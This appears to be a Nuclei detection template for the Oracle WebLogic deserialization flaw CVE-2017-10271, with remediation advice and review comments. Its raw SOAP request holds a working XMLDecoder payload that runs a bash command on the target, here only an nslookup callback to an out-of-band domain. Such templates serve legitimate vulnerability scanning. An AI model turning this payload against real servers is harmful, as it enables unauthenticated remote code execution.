nuclei-templates/cves/2017/CVE-2017-10271.yaml


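# Nuclei template: out-of-band check for CVE-2017-10271 (Oracle WebLogic).
# A host is reported only when the request below yields both an HTTP 500
# response and a DNS lookup of the per-scan interactsh domain.
id: CVE-2017-10271

info:
  name: Oracle WebLogic Server Component Remote Command Execution
  author: dr_set
  severity: high
  # NOTE(review): the description names T3 as the access vector, while the
  # request in this template is sent over HTTP to /wls-wsat/CoordinatorPortType.
  description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server.
  remediation: Apply the Oracle Critical Patch Update of October 2017 listed in the references, and limit network exposure of the /wls-wsat/ endpoints on servers that do not need them.
  reference:
    - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
    - https://github.com/SuperHacker-liuan/cve-2017-10271-poc
    - https://www.oracle.com/security-alerts/cpuoct2017.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-10271
  classification:
    # The vector scores availability impact only (C:N/I:N/A:H), which is why a
    # remote command execution issue is rated 7.5 / high here.
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.50
    cve-id: CVE-2017-10271
  tags: cve,cve2017,rce,oracle,weblogic,oast

requests:
  # The SOAP WorkContext header carries a java.beans.XMLDecoder document; the
  # only command it asks the server to run is an nslookup of the interactsh
  # domain, which serves as the out-of-band marker.
  # Coverage caveat: the marker depends on /bin/bash and nslookup existing on
  # the host and on outbound DNS being allowed, so a missing callback does not
  # by itself show that the server is patched.
  # The empty line after the Content-Type header is required: it separates the
  # HTTP headers from the XML body.
  - raw:
      - |
        POST /wls-wsat/CoordinatorPortType HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Language: en
        Content-Type: text/xml

        <?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope
          xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext
              xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                  <array class="java.lang.String" length="3">
                    <void index="0">
                      <string>/bin/bash</string>
                    </void>
                    <void index="1">
                      <string>-c</string>
                    </void>
                    <void index="2">
                      <string>nslookup {{interactsh-url}}</string>
                    </void>
                  </array>
                <void method="start"/></void>
              </java>
            </work:WorkContext>
          </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>

    # Both matchers must hold; the status check alone would also match
    # unrelated server errors.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS interaction
        words:
          - "dns"

      - type: status
        status:
          - 500

# Enhanced by mp on 2022/04/05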